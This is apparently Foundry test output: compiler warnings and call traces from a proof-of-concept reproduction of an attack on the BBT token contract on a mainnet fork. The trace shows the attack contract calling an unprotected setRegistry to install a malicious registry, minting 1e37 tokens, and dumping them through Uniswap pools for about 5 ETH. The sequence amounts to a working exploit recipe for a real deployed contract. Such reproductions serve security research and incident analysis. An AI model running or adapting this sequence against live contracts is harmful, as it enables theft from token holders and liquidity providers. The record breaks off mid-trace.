Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.17s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/BBT_exp.sol:33:9:
   |
33 |         address attacker = cal_address(0);
   |         ^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
  --> src/test/2024-03/BBT_exp.sol:25:5:
   |
25 |     address attacker;
   |     ^^^^^^^^^^^^^^^^

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/BBT_exp.sol:23:5:
   |
23 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/BBT_exp.sol:24:5:
   |
24 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/BBT_exp.sol:73:5:
   |
73 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/BBT_exp.sol:75:5:
   |
75 |     IERC20 private constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-03/BBT_exp.sol:70:1:
   |
70 | contract Money is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-03/BBT_exp.sol:119:5:
    |
119 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
   --> src/test/2024-03/BBT_exp.sol:122:1:
    |
122 | contract Moneys is Test {
    | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
   --> src/test/2024-03/BBT_exp.sol:138:5:
    |
138 |     fallback() external payable {}
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/BBT_exp.sol:133:9:
    |
133 |         string memory _name
    |         ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2024-03/BBT_exp.sol:43:5:
   |
43 |     function cal_address(
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
   --> src/test/2024-03/BBT_exp.sol:132:5:
    |
132 |     function getContractAddress(
    |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 736.12ms (1.88ms CPU time)

Ran 1 test for src/test/2024-03/BBT_exp.sol:ContractTest
[PASS] testExploit() (gas: 5136067)
Logs:
  [Begin] Attacker ETH before exploit: 0.000000000000000000
  [End] Attacker ETH after exploit: 5.063858067635448251

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19417822 [1.941e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [5187067] ContractTest::testExploit()
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker ETH before exploit", val: 0, decimals: 18)
    ├─ [4971695] → new Money@0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7
    │   ├─ [1287480] → new Moneys@0xeF811eAAc5602399B5438090C851fb455bfFE529
    │   │   ├─  storage changes:
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 31: 0 → 0x0000000000000000000000ac4d2f229a3499f7e4e90a5932758a6829d69cff01
    │   │   │   @ 32: 0 → 0x00000000000000000000000080cf1fa0677f49aca037b60ab7475bf18663eaf7
    │   │   └─ ← [Return] 6097 bytes of code
    │   ├─ [10342] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::setRegistry(Moneys: [0xeF811eAAc5602399B5438090C851fb455bfFE529])
    │   │   ├─ [5397] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::setRegistry(Moneys: [0xeF811eAAc5602399B5438090C851fb455bfFE529]) [delegatecall]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0: 0x000000000000000000000000bbf4bf38a93b04a0ad4dc37952b155f8e6db7508 → 0x000000000000000000000000ef811eaac5602399b5438090c851fb455bffe529
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return]
    │   ├─ [32204] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::mint(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 10000000000000000000000000000000000000 [1e37])
    │   │   ├─ [31756] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::mint(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 10000000000000000000000000000000000000 [1e37]) [delegatecall]
    │   │   │   ├─ [1303] Moneys::getContractAddress("Savings") [staticcall]
    │   │   │   │   └─ ← [Return] Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7]
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], value: 10000000000000000000000000000000000000 [1e37])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc9d35a173db7df5a0066c0800391da2210f22c8896e9ac55d1b43705a9b05137: 0 → 0x000000000000000000000000000000000785ee10d5da46d900f436a000000000
    │   │   │   │   @ 0x52c63247e1f47db19d5ce0460030c497f067ca4cebf71ba98eeadabe20bace02: 0x00000000000000000000000000000000000000000000d3c21bcecceda1000000 → 0x000000000000000000000000000000000785ee10d5db1a9b1cc3038da1000000
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return]
    │   ├─ [25252] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─ [24801] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   ├─ emit Approval(owner: Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xaff06d421a9c3a354ad44aa4aa34edf498b563219983eda5b322a6f51445a9f1: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [104186] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETH(1000000000000000000000000000000 [1e30], 0, [0x3541499cda8CA51B24724Bb8e7Ce569727406E04, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 1710232307 [1.71e9])
    │   │   ├─ [2504] 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 6080169684625665303072 [6.08e21], 1949309415073704114 [1.949e18], 1710181343 [1.71e9]
    │   │   ├─ [9080] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::transferFrom(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d, 1000000000000000000000000000000 [1e30])
    │   │   │   ├─ [8623] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::transferFrom(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d, 1000000000000000000000000000000 [1e30]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], to: 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d, value: 1000000000000000000000000000000 [1e30])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5e3f6a0aea88b29bf595d98366b62e1b6997bcc9b984fcc8cb608e6e0013f39b: 0x0000000000000000000000000000000000000000000001499b4e020c23a02220 → 0x000000000000000000000000000000000000000c9f2c9e19e1c2eff663a02220
    │   │   │   │   │   @ 0xc9d35a173db7df5a0066c0800391da2210f22c8896e9ac55d1b43705a9b05137: 0x000000000000000000000000000000000785ee10d5da46d900f436a000000000 → 0x000000000000000000000000000000000785ee0436adaa08ba7f48b5c0000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [65354] 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d::swap(0, 1949309403185908788 [1.949e18], 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   ├─ [29962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 1949309403185908788 [1.949e18])
    │   │   │   │   ├─ emit Transfer(from: 0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 1949309403185908788 [1.949e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe990995f94f4ddac1e317bca557768768ead9d1bee18e03262729c78b2d130ca: 0x0000000000000000000000000000000000000000000000001b0d5695cacae8b2 → 0x00000000000000000000000000000000000000000000000000000002c4915c7e
    │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x0000000000000000000000000000000000000000000000001b0d569306398c34
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1035] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::balanceOf(0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d) [staticcall]
    │   │   │   │   ├─ [587] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::balanceOf(0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1000000006080169684625665303072 [1e30]
    │   │   │   │   └─ ← [Return] 1000000006080169684625665303072 [1e30]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xDEC556c2DDF5D79f56801e8A669a1eEba23af94d) [staticcall]
    │   │   │   │   └─ ← [Return] 11887795326 [1.188e10]
    │   │   │   ├─ emit Sync(reserve0: 1000000006080169684625665303072 [1e30], reserve1: 11887795326 [1.188e10])
    │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 1000000000000000000000000000000 [1e30], amount1In: 0, amount0Out: 0, amount1Out: 1949309403185908788 [1.949e18], to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x00000000000000000000000000000000040e9c35973197c3263db83c10303980 → 0x00000000000000000000000000000000041ef305f9969c02c4837c529a5c23fc
    │   │   │   │   @ 10: 0x0000000000000000000000000000655b6589ee287f3158b969228b9c3e7d77bc → 0x00000000000000000000000000006ed4fe279a11e0b842a44298c9daaa98b24c
    │   │   │   │   @ 8: 0x65ef4bdf0000000000001b0d5695cacae8b20000000001499b4e020c23a02220 → 0x65f012f300000000000000000002c4915c7e000c9f2c9e19e1c2eff663a02220
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9223] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(1949309403185908788 [1.949e18])
    │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 1949309403185908788}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 1949309403185908788 [1.949e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x0000000000000000000000000000000000000000000000001b0d569306398c34 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] Money::fallback{value: 1949309403185908788}()
    │   │   │   └─ ← [Stop]
    │   │   └─ ← [Return] [1000000000000000000000000000000 [1e30], 1949309403185908788 [1.949e18]]
    │   ├─ [233575] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETH(1000000000000000000000000000000 [1e30], 0, [0x3541499cda8CA51B24724Bb8e7Ce569727406E04, 0xEa0abF7AB2F8f8435e7Dc4932FFaB37761267843, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 1710232307 [1.71e9])
    │   │   ├─ [2504] 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 17955671502152120375412 [1.795e22], 184117533534682698962021491 [1.841e26], 1710181343 [1.71e9]
    │   │   ├─ [2504] 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 26420011632 [2.642e10], 206525280570423584743789816 [2.065e26], 1710181343 [1.71e9]
    │   │   ├─ [2504] 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 48825579836120 [4.882e13], 12271556046711306141826 [1.227e22], 1710232283 [1.71e9]
    │   │   ├─ [9080] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::transferFrom(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96, 1000000000000000000000000000000 [1e30])
    │   │   │   ├─ [8623] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::transferFrom(Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96, 1000000000000000000000000000000 [1e30]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: Money: [0x80cf1fa0677F49ACa037b60Ab7475Bf18663EaF7], to: 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96, value: 1000000000000000000000000000000 [1e30])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc9d35a173db7df5a0066c0800391da2210f22c8896e9ac55d1b43705a9b05137: 0x000000000000000000000000000000000785ee0436adaa08ba7f48b5c0000000 → 0x000000000000000000000000000000000785edf797810d38740a5acb80000000
    │   │   │   │   │   @ 0x9df2757252821c092e3a87f0c34a3547e12ef9dcf5d58d613012d276a091a3af: 0x0000000000000000000000000000000000000000000003cd60ffc1fb85b79874 → 0x000000000000000000000000000000000000000c9f2ca09da774afe5c5b79874
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [53820] 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96::swap(0, 184117530218781103780477139 [1.841e26], 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4, 0x)
    │   │   │   ├─ [17855] 0xEa0abF7AB2F8f8435e7Dc4932FFaB37761267843::transfer(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4, 184117530218781103780477139 [1.841e26])
    │   │   │   │   ├─ [12904] 0xee7f38c2AD27f90d101705C3b92f8A395FDEB917::transfer(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4, 184117530218781103780477139 [1.841e26]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96, to: 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4, value: 184117530218781103780477139 [1.841e26])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x9a47bd91128b282cd5f4ae2298e5b4877ad332b2313f1ce03cbc41b5aa4e2250: 0x000000000000000000000000000000000000000000aad56de4b4a7ba95a894f8 → 0x0000000000000000000000000000000000000000014321d534c7e226d037cdcb
    │   │   │   │   │   │   @ 0x9df2757252821c092e3a87f0c34a3547e12ef9dcf5d58d613012d276a091a3af: 0x000000000000000000000000000000000000000000984c677e17ad5aed81ac73 → 0x0000000000000000000000000000000000000000000000002e0472eeb2f273a0
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1035] 0x3541499cda8CA51B24724Bb8e7Ce569727406E04::balanceOf(0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96) [staticcall]
    │   │   │   │   ├─ [587] 0x74463eD91bfA45bCa06d59e8B383A89709842F69::balanceOf(0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1000000017955671502152120375412 [1e30]
    │   │   │   │   └─ ← [Return] 1000000017955671502152120375412 [1e30]
    │   │   │   ├─ [1107] 0xEa0abF7AB2F8f8435e7Dc4932FFaB37761267843::balanceOf(0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96) [staticcall]
    │   │   │   │   ├─ [659] 0xee7f38c2AD27f90d101705C3b92f8A395FDEB917::balanceOf(0x5d16f9736f42bBA1917Ee446BBE9fFb244D31c96) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 3315901595181544352 [3.315e18]
    │   │   │   │   └─ ← [Return] 3315901595181544352 [3.315e18]
    │   │   │   ├─ emit Sync(reserve0: 1000000017955671502152120375412 [1e30], reserve1: 3315901595181544352 [3.315e18])
    │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 1000000000000000000000000000000 [1e30], amount1In: 0, amount0Out: 0, amount1Out: 184117530218781103780477139 [1.841e26], to: 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x0000000000000000000000000000000001d9f8491475a9d18865cee2eb5c1b08 → 0x0000000000000000000000000000000001def0a537429549810b0a4b211e62ec
    │   │   │   │   @ 8: 0x65ef4bdf000000984c677e17ad5aed81ac730000000003cd60ffc1fb85b79874 → 0x65f012f30000000000002e0472eeb2f273a0000c9f2ca09da774afe5c5b79874
    │   │   │   │   @ 9: 0x00000000000000000000000000017e707f77d4af9f5eed51337da68f33f80404 → 0x00000000000000000000000000019d96836d152aea108923bfb9d289399fabd4
    │   │   │   └─ ← [Stop]
    │   │   ├─ [59821] 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4::swap(12432485917 [1.243e10], 0, 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, 0x)
    │   │   │   ├─ [23552] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, 12432485917 [1.243e10])
    │   │   │   │   ├─ [16263] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::transfer(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, 12432485917 [1.243e10]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x454bd6d9cB1a33dD74AD07048659cF280dd315A4, to: 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, value: 12432485917 [1.243e10])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x0a211e6453749807c6dfc3fd13462cafa08385290309e1331a1741f31dda3416: 0x0000000000000000000000000000000000000000000000000000000626c16270 → 0x0000000000000000000000000000000000000000000000000000000341b8b453
    │   │   │   │   │   │   @ 0x28c0947f463362aab09a2d7896ccc847fb7e52633a16b978fb2caf3db1a9b8f8: 0x00000000000000000000000000000000000000000000000000002c68175792d8 → 0x00000000000000000000000000000000000000000000000000002c6afc6040f5
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 13987525715 [1.398e10]
    │   │   │   │   └─ ← [Return] 13987525715 [1.398e10]
    │   │   │   ├─ [1107] 0xEa0abF7AB2F8f8435e7Dc4932FFaB37761267843::balanceOf(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4) [staticcall]
    │   │   │   │   ├─ [659] 0xee7f38c2AD27f90d101705C3b92f8A395FDEB917::balanceOf(0x454bd6d9cB1a33dD74AD07048659cF280dd315A4) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 390642810789204688524266955 [3.906e26]
    │   │   │   │   └─ ← [Return] 390642810789204688524266955 [3.906e26]
    │   │   │   ├─ emit Sync(reserve0: 13987525715 [1.398e10], reserve1: 390642810789204688524266955 [3.906e26])
    │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 184117530218781103780477139 [1.841e26], amount0Out: 12432485917 [1.243e10], amount1Out: 0, to: 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x000000000000000000000000000000000000000000120c25ad82cfcecb2adeb8 → 0x000000000000000000000000000000000000000000121350cabb5d0fb5747774
    │   │   │   │   @ 8: 0x65ef4bdf000000aad56de4b4a7ba95a894f80000000000000000000626c16270 → 0x65f012f30000014321d534c7e226d037cdcb0000000000000000000341b8b453
    │   │   │   │   @ 9: 0x00000000000000000049a84dc4c0fbf76ef2f8e3d88fcb4eb42474140015d03c → 0x0000000000000000005f4104096592a3449c1d3cf0ae2d5cac707fb54265368c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [61158] 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc::swap(0, 3114548664449539463 [3.114e18], 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 3114548664449539463 [3.114e18])
    │   │   │   │   ├─ emit Transfer(from: 0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 3114548664449539463 [3.114e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb374801ace2c02f5db0425ab5920a2b7ed1d5a00abbcd395fda7530ba1d666c0: 0x0000000000000000000000000000000000000000000002993e0d06fe54494082 → 0x00000000000000000000000000000000000000000000029912d3ed7c181aa2fb
    │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x0000000000000000000000000000000000000000000000002b3919823c2e9d87
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1339] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [staticcall]
    │   │   │   │   ├─ [553] 0x43506849D7C04F9138D1A2050bbF3A0c054402dd::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 48838012322037 [4.883e13]
    │   │   │   │   └─ ← [Return] 48838012322037 [4.883e13]
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xB4e16d0168e52d35CaCD2c6185b44281Ec28C9Dc) [staticcall]
    │   │   │   │   └─ ← [Return] 12268441498046856602363 [1.226e22]
    │   │   │   ├─ emit Sync(reserve0: 48838012322037 [4.883e13], reserve1: 12268441498046856602363 [1.226e22])
    │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 12432485917 [1.243e10], amount1In: 0, amount0Out: 0, amount1Out: 3114548664449539463 [3.114e18], to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65f012db0000000002993e0d06fe5449408200000000000000002c68175792d8 → 0x65f012f300000000029912d3ed7c181aa2fb00000000000000002c6afc6040f5
    │   │   │   │   @ 10: 0x0000000000000000000000000000000000003b31e194000c94df9930f2179856 → 0x0000000000000000000000000000000000003b31e32e20af9693e4a641aa214e
    │   │   │   │   @ 9: 0x00000000000000000000019a1c4e597cc5694f271bf1eec863b60455d23cb6a4 → 0x00000000000000000000019a1c4fc1063d38ab9711ff1d50cd2ff2b4ab9d717c
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9223] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(3114548664449539463 [3.114e18])
    │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 3114548664449539463}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 3114548664449539463 [3.114e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x0000000000000000000000000000000000000000000000002b3919823c2e9d87 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [0] Money::fallback{value: 3114548664449539463}()
    │   │   │   └─ ← [Stop]
